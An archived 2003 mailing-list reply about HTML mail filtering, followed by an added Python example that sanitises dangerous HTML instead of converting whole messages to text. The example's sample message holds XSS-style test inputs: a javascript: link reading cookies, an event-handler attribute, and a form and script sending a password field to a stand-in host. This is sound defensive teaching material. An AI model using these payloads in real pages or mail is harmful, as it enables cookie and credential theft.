Content Checks: Detected HTML-specific exploits in h8AGGVSe016972

Kevin Spicer kevins at BMRB.CO.UK
Thu Sep 11 16:08:13 IST 2003


On Thu, 2003-09-11 at 15:36, Ugo Bellavance wrote:

>>> I think he means that he would like to have the HTML cleaned from
>>> harmful tags, but without converting into text.

>Ugo

>Surely this is precisely what "Convert Dangerous HTML to Text = yes" is
>for?
>Or am I misunderstanding that MS option?

"Convert Dangerous HTML to Text" converts the _entire_ HTML message to
text if any of the objectionable tags are found.  What I was suggesting
was that a better filter would only remove the dangerous/objectionable
tags.  This however is not as simple as it sounds, and there are all
sorts of things that need thinking about; for example, it's possible to
create a form (or other HTML content) using embedded JavaScript etc.,
therefore all script content should be removed, etc. etc.

By the way I'm not 'objecting' to the current implementation as someone
suggested, for the most part it works well and has definitely stopped
some otherwise dangerous content.  I'm just saying that a more involved
process may improve the user experience.

Personally I'm thinking about applying a ruleset so all my incoming
messages get converted to text, which might stop the Exchange admin
bothering me about the size of my mailbox so often!




BMRB International
http://www.bmrb.co.uk
+44 (0)20 8566 5000
_________________________________________________________________
This message (and any attachment) is intended only for the
recipient and may contain confidential and/or privileged
material.  If you have received this in error, please contact the
sender and delete this message immediately.  Disclosure, copying
or other action taken in respect of this email or in
reliance on it is prohibited.  BMRB International Limited
accepts no liability in relation to any personal emails, or
content of any email which does not directly relate to our
business.
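The two behaviours discussed in this message, side by side, as an added example (Python, written for this page; it is not MailScanner's own Perl code and its tag/attribute allowlists are assumptions, not MailScanner's lists): `strip_dangerous_html` is the selective filter Kevin describes (keep the message as HTML, remove only script content, forms and other dangerous elements, event-handler attributes and non-http/mailto/cid URLs), while `convert_if_dangerous` reproduces the all-or-nothing "Convert Dangerous HTML to Text" behaviour he contrasts it with. The sample message is constructed for the example.

```python
"""Selective HTML sanitiser vs. whole-message conversion (added example, not MailScanner code)."""
import re
from html import escape, unescape
from html.parser import HTMLParser

# Assumed allowlists for illustration; MailScanner's own lists are not reproduced here.
SAFE_TAGS = frozenset({"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li",
                       "table", "tr", "td", "th", "div", "span", "blockquote", "pre",
                       "img", "h1", "h2", "h3", "font"})
# Elements removed together with everything inside them.  Script goes because, as the
# post notes, script can synthesise a form (or any other markup) at render time.
DROP_WITH_CONTENT = frozenset({"script", "style", "form", "iframe", "object", "embed", "applet"})
SAFE_ATTRS = frozenset({"href", "src", "alt", "title", "colspan", "rowspan",
                        "width", "height", "color", "size", "face"})
URL_ATTRS = frozenset({"href", "src"})
URL_SCHEME_OK = re.compile(r"^(https?|mailto|cid):", re.IGNORECASE)
BLOCK_BREAKS = frozenset({"p", "br", "div", "tr", "li", "h1", "h2", "h3"})  # text mode only


class Sanitizer(HTMLParser):
    """Rebuilds the document, keeping only allowlisted tags and attributes."""

    def __init__(self, keep_tags=SAFE_TAGS):
        super().__init__(convert_charrefs=True)
        self.keep_tags = keep_tags
        self.out = []        # sanitised fragments
        self.removed = []    # audit trail of what was stripped ("tag" or "tag@attr")
        self.drop_depth = 0  # > 0 while inside a DROP_WITH_CONTENT element

    def _clean_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            name, value = name.lower(), value or ""
            if name.startswith("on"):            # onload, onmouseover, ... are script too
                self.removed.append(f"{tag}@{name}")
                continue
            if name not in SAFE_ATTRS:
                continue
            if name in URL_ATTRS:
                # Remove whitespace/control chars first so "jav\tascript:" cannot slip past.
                compact = re.sub(r"[\x00-\x20]", "", value)
                if not URL_SCHEME_OK.match(compact):
                    self.removed.append(f"{tag}@{name}")
                    continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        return "".join(kept)

    def handle_starttag(self, tag, attrs):
        if self.drop_depth:
            if tag in DROP_WITH_CONTENT:
                self.drop_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.drop_depth = 1
            self.removed.append(tag)
            return
        if tag not in self.keep_tags:
            self.removed.append(tag)
            if tag in BLOCK_BREAKS:  # keep paragraph structure readable in text mode
                self.out.append("\n")
            return
        self.out.append(f"<{tag}{self._clean_attrs(tag, attrs)}>")

    def handle_startendtag(self, tag, attrs):
        # Self-closing form (<br/>, <embed/>): a dropped element here has no content to skip.
        if tag in DROP_WITH_CONTENT:
            if not self.drop_depth:
                self.removed.append(tag)
            return
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if self.drop_depth:
            if tag in DROP_WITH_CONTENT:
                self.drop_depth -= 1
            return
        if tag in self.keep_tags:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments (including <!--[if IE]> conditionals) carry nothing a reader needs


def strip_dangerous_html(html_text):
    """Selective filter: the message stays HTML, only the dangerous parts are removed."""
    p = Sanitizer()
    p.feed(html_text)
    p.close()
    return "".join(p.out), p.removed


def html_to_text(html_text):
    """Whole-message conversion: every tag goes, only the text survives."""
    p = Sanitizer(keep_tags=frozenset())
    p.feed(html_text)
    p.close()
    return unescape("".join(p.out)).strip()


def convert_if_dangerous(html_text):
    """All-or-nothing behaviour the post attributes to 'Convert Dangerous HTML to Text':
    one objectionable tag and the whole message becomes plain text."""
    _, removed = strip_dangerous_html(html_text)
    return html_to_text(html_text) if removed else html_text


# Constructed sample message: benign markup mixed with the things the post worries about.
SAMPLE = (
    '<p>Hi <b>team</b>, see the <a href="https://example.com/report">report</a>.</p>'
    "<script>document.write('<form action=\"https://evil.example/steal\">')</script>"
    '<p onmouseover="alert(1)">Hover me</p>'
    '<a href="javascript:alert(document.cookie)">click</a>'
    '<form action="https://evil.example/steal"><input name="pw"></form>'
    '<img src="cid:logo@mail" alt="logo">'
)

if __name__ == "__main__":
    cleaned, removed = strip_dangerous_html(SAMPLE)
    print("selective:", cleaned, removed, sep="\n  ")
    print("all-or-nothing:", convert_if_dangerous(SAMPLE), sep="\n  ")
```

Run on the sample, the selective filter keeps the readable paragraph, links and inline image and reports exactly what it stripped (the script, the `onmouseover` handler, the `javascript:` link and the form), whereas the all-or-nothing path turns the whole message into text because something objectionable was present. The URL check is an allowlist of schemes rather than a denylist of `javascript:`, so schemeless and `data:` URLs are also dropped; relax `URL_SCHEME_OK` if your mail needs them.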
